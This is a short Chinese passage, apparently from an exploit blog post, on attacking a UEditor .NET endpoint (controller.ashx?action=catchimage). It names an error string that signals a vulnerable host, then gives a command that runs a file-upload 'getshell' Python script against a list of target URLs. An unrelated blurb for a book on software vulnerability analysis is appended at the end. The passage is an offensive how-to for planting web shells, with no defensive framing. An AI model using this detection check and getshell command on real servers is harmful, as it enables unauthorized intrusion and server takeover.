===================================

1、检测，完整domo页面

2、检测poc，出现 '参数错误：没有指定抓取源' 可能存在漏洞

 http://xxxxx.com:xx/controller.ashx？action=catchimage

3、Getshell 利用

python .\ueditor_fileupload_getshell.py -f ./url.txt

0x03 项目链接下载

本书系统地讲解了软件漏洞分析与利用所需的各类工具、理论技术和实战方法，主要涉及Windows和Linux操作系统平台，选择经典漏洞作为实践项目，项目内容由浅入深、由易到难，比较容易操作和实现，旨在通过实践提高读者对软件漏洞的分析和利用能力及针对各种破解手段的防范能力。全书内容分为12章，每章中的实践项目包括项目目的、项目环境及工具、知识要点、项目实现和步骤及思考题等部分。